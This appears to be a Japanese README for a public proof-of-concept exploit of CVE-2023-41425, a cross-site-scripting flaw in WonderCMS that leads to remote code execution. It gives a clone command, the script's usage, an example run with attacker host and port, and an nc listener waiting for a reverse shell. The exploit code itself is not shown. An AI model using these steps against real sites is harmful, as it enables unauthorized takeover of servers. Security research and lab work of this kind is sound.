
CVE-2023-41425 - Wonder CMS v.3.2.0からv.3.4.2におけるクロスサイトスクリプティング脆弱性により、リモート攻撃者がinstallModuleコンポーネントにアップロードされた細工されたスクリプトを介して任意のコードを実行できる。
Wonder CMS v.3.2.0~v.3.4.2におけるクロスサイトスクリプティングの脆弱性により、リモート攻撃者がinstallModuleコンポーネントにアップロードした細工されたスクリプトを介して任意のコードを実行できる可能性があります。教育目的のみ
loginURLの知識、管理者アクセス権、または管理者にXSSリンクをクリックさせる能力が必要です。
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
nc -lnvp 9001

脆弱性の発見と報告をしてくれたprodigiousMind https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413